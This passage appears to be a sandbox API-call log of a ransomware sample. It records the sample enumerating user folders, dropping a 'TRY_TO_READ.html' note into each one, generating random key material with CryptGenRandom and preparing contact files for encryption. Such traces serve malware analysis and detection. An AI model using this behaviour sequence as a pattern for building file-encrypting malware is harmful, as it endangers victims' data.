returned 0x35c0020 [0160.580] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.580] ReadFile (in: hFile=0x37c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x1e6600, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x1e6600, lpOverlapped=0x0) returned 1 [0160.665] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x97810570, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97810570, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e258 [0160.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0160.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.666] GetLastError () returned 0x0 [0160.666] FindNextFileW (in: hFindFile=0x35e258, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x97810570, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97810570, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.666] GetLastError () returned 0x0 [0160.666] FindNextFileW (in: hFindFile=0x35e258, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0160.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.666] GetLastError () returned 0x0 [0160.666] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380 [0160.667] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3291b0 | out: hHeap=0x2e0000) returned 1 [0160.667] WriteFile (in: hFile=0x380, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0160.668] WriteFile (in: hFile=0x380, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0160.669] WriteFile (in: hFile=0x380, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0160.669] CloseHandle (hObject=0x380) returned 1 [0160.669] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0160.669] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383db0 | out: hHeap=0x2e0000) returned 1 [0160.669] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.669] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338a98 | out: hHeap=0x2e0000) returned 1 [0160.669] FindNextFileW (in: hFindFile=0x35e258, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0160.669] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.669] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.669] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.669] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.669] GetLastError () returned 0x0 [0160.669] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380 [0160.670] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0160.670] WriteFile (in: hFile=0x380, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0160.671] WriteFile (in: hFile=0x380, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0160.671] WriteFile (in: hFile=0x380, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0160.671] CloseHandle (hObject=0x380) returned 1 [0160.671] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0160.671] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383db0 | out: hHeap=0x2e0000) returned 1 [0160.671] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.671] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338ca0 | out: hHeap=0x2e0000) returned 1 [0160.671] FindNextFileW (in: hFindFile=0x35e258, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0160.672] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.672] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.672] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.672] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.672] GetLastError () returned 0x0 [0160.672] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380 [0160.672] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3291b0 | out: hHeap=0x2e0000) returned 1 [0160.672] WriteFile (in: hFile=0x380, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0160.673] WriteFile (in: hFile=0x380, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0160.673] WriteFile (in: hFile=0x380, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0160.673] CloseHandle (hObject=0x380) returned 1 [0160.673] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0160.673] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383db0 | out: hHeap=0x2e0000) returned 1 [0160.673] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.673] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338d08 | out: hHeap=0x2e0000) returned 1 [0160.674] FindNextFileW (in: hFindFile=0x35e258, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97810570, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97810570, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97810570, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0160.674] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.674] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.674] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.674] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.674] GetLastError () returned 0xb7 [0160.674] FindNextFileW (in: hFindFile=0x35e258, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97810570, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97810570, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97810570, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0160.674] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x70) returned 0x335e78 [0160.674] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3389c8 | out: hHeap=0x2e0000) returned 1 [0160.674] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0160.674] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0a8 | out: hHeap=0x2e0000) returned 1 [0160.674] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97810570, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97810570, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97810570, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0160.675] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0160.675] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x335e78 | out: hHeap=0x2e0000) returned 1 [0160.675] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324c48 | out: hHeap=0x2e0000) returned 1 [0160.675] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dea0 | out: hHeap=0x2e0000) returned 1 [0160.675] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e298 [0160.675] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.675] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.675] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.675] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.675] GetLastError () returned 0x5 [0160.675] FindNextFileW (in: hFindFile=0x35e298, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.675] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.675] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.675] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.675] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.675] GetLastError () returned 0x5 [0160.675] FindNextFileW (in: hFindFile=0x35e298, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0160.675] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.675] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.675] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.675] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.675] GetLastError () returned 0x5 [0160.675] FindNextFileW (in: hFindFile=0x35e298, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0160.675] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.676] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.676] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.676] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.676] GetLastError () returned 0x5 [0160.676] FindNextFileW (in: hFindFile=0x35e298, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0160.676] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.676] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.676] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.676] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.676] GetLastError () returned 0x5 [0160.676] FindNextFileW (in: hFindFile=0x35e298, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0160.676] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.676] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.676] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.676] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.676] GetLastError () returned 0x5 [0160.676] FindNextFileW (in: hFindFile=0x35e298, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0160.676] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.676] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.676] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.676] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.676] GetLastError () returned 0x5 [0160.676] FindNextFileW (in: hFindFile=0x35e298, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0160.676] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.676] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.676] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.676] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.676] GetLastError () returned 0x5 [0160.676] FindNextFileW (in: hFindFile=0x35e298, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0160.676] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.677] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.677] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.677] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.677] GetLastError () returned 0x5 [0160.677] FindNextFileW (in: hFindFile=0x35e298, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978366d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0160.677] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.677] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.677] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.677] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.677] GetLastError () returned 0x5 [0160.677] FindNextFileW (in: hFindFile=0x35e298, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978366d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0160.677] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328e80 [0160.677] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.677] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.677] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.677] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.677] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", dwFileAttributes=0x80) returned 1 [0160.678] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 61 [0160.678] GetProcessHeap () returned 0x2e0000 [0160.678] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe0) returned 0x319d30 [0160.678] lstrcpyW (in: lpString1=0x319d30, 